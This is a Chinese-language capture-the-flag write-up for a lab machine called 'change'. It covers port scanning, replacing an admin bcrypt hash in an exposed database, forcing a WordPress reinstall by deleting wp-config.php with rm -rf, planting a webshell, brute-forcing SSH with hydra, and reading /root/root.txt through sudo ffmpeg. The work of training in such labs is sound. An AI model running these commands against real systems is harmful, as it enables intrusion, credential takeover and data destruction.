群友靶机-Easy-change 1 信息收集 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ┌──(root㉿kali)-[~] └─# nmap 10.22.23.140 -p- -sV Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 04:56 EDT Nmap scan report for 10.22.23.140 Host is up (0.00034s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) 80/tcp open http Apache httpd 2.4.62 ((Debian)) 3306/tcp open mysql MariaDB 5.5.5-10.5.23 MAC Address: 08:00:27:DC:2C:17 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done : 1 IP address (1 host up) scanned in 7.94 seconds
2 User 2.1 change.dsz 信息收集找到了一个入口点:http://10.22.23.140
进入后发现 Please visit: change.dsz 的提示
最开始没见到过靶机还要使用域名访问,没反映过来是什么意思,还到处找change.dsz是什么文件
后面拷打ai才反应过来是要使用域名访问
于是设置下 windows 目录下的 hosts 文件
1 2 10.22.23.140 change.dsz 10.22.23.140 change.dsz.
域名访问就看到东西了
登录界面,然后原本是想用bp抓包爆破的,结果一看
看来有个数据库,连上后能够看到密码
1 $2y$10$EFCK8LdjkDv1W52q0bV8.OLUicO8h6kYBqU5nE1jOcSq3qQ9l5mZG
cmd5没办法解出来,但是看到数据库里面没有 salt 值,那不就能用相同方式构造个不同 salt 值的加密密文
继续拷打ai
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 import bcryptnew_password = b"123456" salt = bcrypt.gensalt(rounds=10 ) hashed = bcrypt.hashpw(new_password, salt) hashed_str = hashed.decode('utf-8' ) hashed_str_2y = hashed_str.replace('$2b$' , '$2y$' , 1 ) print ("新哈希:" , hashed_str_2y)
1 $2y$10$uH.zuJMRyc.oCCSg/n4hxue.WRaNKFIbwjEqnQHyIKh1Yj5wfN7si
替换数据库密码就能用 root:123456 直接进去了
然后就能看到一个命令执行系统和一个查询id系统的,查询id的感觉没什么
感觉关键点应该是在前面的命令执行,但是这个命令执行缺失只能执行 ls、rm 、pwd
发现还有⼀个域名 (我原本都以为就到命令执行就快结束了。。。)
1 2 3 4 5 6 7 8 ls /var/www -altotal 20 drwxr-xr-x 5 www-data www-data 4096 Jul 20 09:09 . drwxr-xr-x 12 root root 4096 Apr 1 10:05 .. drwxr-xr-x 2 www-data www-data 4096 Jul 20 09:08 change.dsz drwxr-xr-x 2 www-data www-data 4096 Jul 20 09:47 html drwxr-xr-x 5 www-data www-data 4096 Jul 21 01:03 wordpress.change.dsz
和之前一样加到 hosts 文件中
1 2 10.22.23.140 wordpress.change.dsz 10.22.23.140 wordpress.change.dsz.
2.2 wordpress.change.dsz 访问后发现是一个wordpress的博客界面
先看看目录结构
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ls /var/www/wordpress.change.dsz/ -altotal 252 drwxr-xr-x 5 www-data www-data 4096 Jul 21 01:03 . drwxr-xr-x 5 www-data www-data 4096 Jul 20 09:09 .. -rw-r--r-- 1 www-data www-data 492 Jul 20 09:16 .htaccess -rw-r--r-- 1 www-data www-data 405 Feb 6 2020 index.php -rw-r--r-- 1 www-data www-data 19903 Jul 21 00:04 license.txt -rw-r--r-- 1 www-data www-data 7425 Jul 21 00:04 readme.html -rw-r--r-- 1 www-data www-data 7387 Feb 13 2024 wp-activate.php drwxr-xr-x 9 www-data www-data 4096 May 4 14:00 wp-admin -rw-r--r-- 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php -rw-r--r-- 1 www-data www-data 2323 Jun 14 2023 wp-comments-post.php -rw-r--r-- 1 www-data www-data 3336 Oct 15 2024 wp-config-sample.php -rw-rw-rw- 1 www-data www-data 3607 Jul 21 00:51 wp-config.php drwxr-xr-x 7 www-data www-data 4096 Jul 21 05:18 wp-content -rw-r--r-- 1 www-data www-data 5617 Aug 2 2024 wp-cron.php drwxr-xr-x 30 www-data www-data 16384 May 4 14:00 wp-includes -rw-r--r-- 1 www-data www-data 2502 Nov 26 2022 wp-links-opml.php -rw-r--r-- 1 www-data www-data 3937 Mar 11 2024 wp-load.php -rw-r--r-- 1 www-data www-data 51414 Feb 3 11:55 wp-login.php -rw-r--r-- 1 www-data www-data 8727 Feb 8 11:00 wp-mail.php -rw-r--r-- 1 www-data www-data 30081 Mar 4 08:06 wp-settings.php -rw-r--r-- 1 www-data www-data 34516 Mar 10 14:16 wp-signup.php -rw-r--r-- 1 www-data www-data 5102 Oct 18 2024 wp-trackback.php -rw-r--r-- 1 www-data www-data 3205 Nov 8 2024 xmlrpc.php
继续看看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ls /var/www/wordpress.change.dsz/wp-adminls : cannot access '' : No such file or directory/var/www/wordpress.change.dsz/wp-admin: ........... erase-personal-data.php export-personal-data.php export.php freedoms.php images import.php includes index.php install-helper.php install.php ..........
访问后台 /wp-admin ,爆破了一会会发现进不去,这个时候发现 /wp-admin 下有一个 /install.php 访问看看
http://wordpress.change.dsz/wp-admin/install.php
这个时候联想到前面没用上的 rm
在通过查找发现要重新安装要删除更目录下的 wp-config.php
于是又返回 change.dsz
1 rm -rf /var/www/wordpress.change.dsz/wp-config.php
然后再访问就能够跳转到安装界面
http://wordpress.change.dsz/wp-admin/setup-config.php
按照顺序安装,这里好像靶机的数据库因为不是 root 所以安装不了,所以我是用本机的 windows 安装的数据库,
然后如果要用小皮数据库的话,记得要先设置下允许外部 ip 连接数据库
1 2 3 4 5 6 7 8 9 10 [mysqld] bind-address = 0.0.0.0 skip-networking = OFF -- 授权所有IP可访问 GRANT ALL PRIVILEGES ON *.* TO 'root' @'%' IDENTIFIED BY '123456' WITH GRANT OPTION;b -- 刷新权限 FLUSH PRIVILEGES;
之后就能够用设置的账号密码进入后台
进入后台后,找到工具下的主题文件编辑器
找个php写入一句话木马
然后连上就行了
1 2 www-data:/home/lzh) $ cat user.txt flag{root-8d4727897d0129417e1f3f91d1474c1c}
Root 在家目录下可以发现一个字典
那肯定是要开始爆破了
1 hydra -l lzh -P ./2.lst ssh://10.22.23.140 -V -I -e nsr -t 64
发现密码是
连上后看下
发现有个ffmpeg
这个是一个操作音频和视频的工具,在有sudo后能够读取文件
然后拷打拷打ai就能够读取到root下的flag
拷打结果
1 sudo /usr/bin/ffmpeg -f data -i /root/root.txt -map 0 -codec copy -f rawvideo user.txt
1 2 lzh@Change:~$ cat root.txt flag{root-8d4727897d0129417e1f3f91d1474c1c}